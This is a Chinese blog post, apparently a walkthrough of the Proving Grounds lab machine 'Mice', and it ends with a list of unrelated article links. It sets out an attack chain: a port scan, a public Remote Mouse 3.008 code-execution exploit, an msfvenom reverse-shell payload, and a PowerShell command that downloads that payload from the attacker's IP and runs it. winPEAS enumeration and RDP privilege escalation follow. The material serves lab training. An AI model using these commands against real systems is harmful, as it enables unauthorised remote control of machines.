当前位置：首页 > news >正文

PG靶机复现 Mice

news 2025/6/16 10:19:35

端口扫描

nmap -sC -sV -Pn -n -T4 -p- 192.168.229.199
在这里插入图片描述

枚举和利用

google一下发现可能存在
Remote Mouse 3.008 - Failure to Authenticate

RemoteMouse 应用程序是一个可以从手机或平板电脑远程控制计算机的程序。这个漏洞允许连接到远程 RemoteMouse 服务，以虚拟方式按下任意键并在机器上执行代码。
exp：

https://github.com/p0dalirius/RemoteMouse-3.008-Exploit/tree/master

生成恶意exe文件

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=80 -f exe > reshell.exe

在这里插入图片描述

python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "powershell -c \"iwr http://192.168.45.227/reshell.exe -o C:\Windows\Temp\reshell.exe\""

在这里插入图片描述

python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "C:\Windows\Temp\reshell.exe"

在这里插入图片描述

提取

查找发现local文件

powershell Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinue

在这里插入图片描述

powershell iwr http://192.168.45.227/winPEASx64.exe -o winPEASx64.exe

在这里插入图片描述
发现

但是我们需要rdp进入，该shell用户是rdp组
请添加图片描述

查看密码文件，发现密码

得到密码，现在可以rdp进入系统

在这里插入图片描述
查看提权步骤：

在右下角打卡

选择Change

然后回车

成功提权

查看全文

http://www.xdnf.cn/news/1054999.html

windows server部署.net项目（nopcommerce）

Luckfox Pico Pro Max SD 卡镜像扩容方法

Spark核心概念与DAG执行原理笔记

Skip-Gram CBOW

通达信玄学首板抓首版指标

深入探索Joomla子模板：解决模板更新覆盖问题的终极方案

调和级数发散 P级数判别法

git 开源平台网站推荐 (2025-06 更新)

hot100 -- 14.贪心算法

土建施工安全管理难？免费AI系统 24h 监控预警

Android16变更

NodeJS哪些情况下会造成内存泄漏和避免方法

Unity3D仿星露谷物语开发63之NPC移动

多模态大语言模型arxiv论文略读（122）

SAP实施服务专家——哲讯科技，赋能企业智慧升级

DAY 50 超大力王爱学Python

ROS2中，如果对rviz格式文件做了修改，都需要重新编译才可以launch出新的rviz配置对么？

4，QT文件操作

02-D3.js 控制横向柱图切换数据带动画效果

创始人IP如何崛起：系统化打造的实践路径 | 创客匠人

web性能优化

动态规划之斐波那契数（一）

【已解决】bash: /usr/bin/perl: bad interpreter: No such file or directory

UI学习汇总

Yocto vs Buildroot：SDK（软件开发套件）创建能力全面对比

快速入门多线程（一）：线程生命周期详解（附流程图详解）

Python数字信号处理——利用块间系数相关性的DCT域鲁棒盲图像水印（PyQT5界面）

【分析学】实数

Spring事务传播机制深度解析

c++类型擦除

端口扫描

枚举和利用

提取

相关文章：